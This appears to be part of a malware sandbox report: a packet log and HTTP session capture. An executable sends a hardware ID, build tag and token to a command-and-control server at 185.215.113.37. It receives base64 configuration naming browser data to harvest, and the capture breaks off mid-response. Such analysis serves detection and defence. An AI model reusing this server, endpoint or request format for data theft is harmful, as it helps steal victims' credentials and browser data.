Oct 13, 2024 17:46:20.806364059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806386948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.806386948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.806387901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806415081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.806515932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.806530952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806546926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806556940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806566954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806576967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806586981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806597948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806607962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806608915 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.806608915 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.806619883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806628942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806639910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806643009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.806643009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.806674004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.806771040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806816101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806827068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806837082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806849003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.806849003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.806924105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806934118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806943893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806962013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806963921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.806963921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.806972980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806983948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806994915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807008982 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.807008982 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.807039976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807055950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807065964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807076931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807086945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807087898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.807087898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.807099104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807110071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807118893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807125092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.807125092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.807152033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.807223082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807233095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807241917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807259083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807269096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807280064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807290077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807293892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.807293892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.807307005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807315111 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.807318926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807332039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807343006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807353020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807358980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.807358980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.807365894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807377100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807404995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.807404995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.807424068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807456017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.807456017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.807461023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807471991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807508945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.807508945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.807565928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807576895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807586908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807602882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807614088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807624102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807634115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807636976 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.807636976 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.807645082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.807662964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.807754993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.895476103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.895488977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.895499945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.895512104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.895522118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.895533085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.895548105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.895559072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.895556927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.895735025 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.929538965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.929574966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.929584980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.929595947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.929606915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.929616928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.929629087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.929639101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.929650068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.929658890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.929668903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.929687023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.929721117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.929721117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.067229033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.072274923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299129963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299144983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299155951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299175978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299186945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299197912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299207926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299285889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.299285889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.299303055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299314976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299325943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299335957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299346924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299357891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299380064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.299380064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.299398899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.299436092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299447060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299457073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299468040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299478054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.299478054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299490929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299504995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299523115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.299523115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.299549103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299560070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299570084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299580097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299591064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299592972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.299592972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.299602032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299612999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299623013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299633980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299643040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.299643040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.299644947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299658060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299693108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299695015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.299695015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.299704075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299715042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299731016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.299737930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299748898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299760103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299770117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299781084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299781084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.299781084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.299792051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299803019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299813032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299813986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.299813986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.299824953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299871922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.299871922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.299880028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299890995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299901009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299911976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299920082 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.299922943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299946070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299952984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.299952984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.299957991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299969912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299981117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.299983978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.299993038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.300035954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.300035954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.300246954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.300256968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.300266981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.300277948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.300293922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.300295115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.300306082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.300317049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.300324917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.300328970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.300340891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.300350904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.300360918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.300371885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.300373077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.300373077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.300383091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.300394058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.300409079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.300409079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.300437927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.831631899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.831631899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:21.837363005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:21.837491035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:22.721456051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:22.722251892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:23.173433065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:23.181056976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:23.403460026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:23.403476000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:23.403486967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:23.403531075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:23.403580904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:23.406883001 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:23.411712885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:23.629471064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:23.629539013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:23.648099899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:23.653084040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:24.359570026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:24.361248016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:24.393646955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:24.398408890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:24.630564928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:24.630577087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:24.630588055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:24.630593061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:24.630604029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:24.632601976 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:24.632601976 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:24.637418985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:25.348882914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:25.350131989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:29.378777981 CEST	49730	80	192.168.2.4	185.215.113.37

HTTP Request Dependency Graph

185.215.113.37

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.215.113.37	80	7568	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:46:07.837249994 CEST	89	OUT	GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Oct 13, 2024 17:46:08.550221920 CEST	203	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 15:46:08 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 13, 2024 17:46:08.553280115 CEST	412	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJKKJKEHDBGIDGDHCFHI Host: 185.215.113.37 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 39 44 38 37 35 46 32 42 32 31 35 33 32 35 36 34 35 30 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 2d 2d 0d 0a Data Ascii: ------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="hwid"D9D875F2B2153256450765------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="build"doma------KJKKJKEHDBGIDGDHCFHI--
Oct 13, 2024 17:46:08.795490980 CEST	407	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 15:46:08 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4e 7a 41 31 4e 7a 6c 6a 4e 54 59 78 4d 47 55 31 59 54 67 78 4d 6a 4d 34 4f 44 42 6b 4d 47 52 69 59 54 42 6d 4e 32 56 68 4e 44 49 78 5a 47 59 77 4e 57 51 31 4d 6a 6c 69 4e 44 4d 79 5a 57 45 79 59 57 45 30 59 57 45 77 4d 6d 5a 6b 4f 54 68 69 5a 44 67 32 5a 47 59 35 59 54 64 6b 5a 6d 4d 77 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: NzA1NzljNTYxMGU1YTgxMjM4ODBkMGRiYTBmN2VhNDIxZGYwNWQ1MjliNDMyZWEyYWE0YWEwMmZkOThiZDg2ZGY5YTdkZmMwfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Oct 13, 2024 17:46:08.796888113 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDAEHCFHJJJJECAAFBKJ Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 41 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 30 35 37 39 63 35 36 31 30 65 35 61 38 31 32 33 38 38 30 64 30 64 62 61 30 66 37 65 61 34 32 31 64 66 30 35 64 35 32 39 62 34 33 32 65 61 32 61 61 34 61 61 30 32 66 64 39 38 62 64 38 36 64 66 39 61 37 64 66 63 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 41 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 41 46 42 4b 4a 2d 2d 0d 0a Data Ascii: ------IDAEHCFHJJJJECAAFBKJContent-Disposition: form-data; name="token"70579c5610e5a8123880d0dba0f7ea421df05d529b432ea2aa4aa02fd98bd86df9a7dfc0------IDAEHCFHJJJJECAAFBKJContent-Disposition: form-data; name="message"browsers------IDAEHCFHJJJJECAAFBKJ--
Oct 13, 2024 17:46:09.019530058 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 15:46:08 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 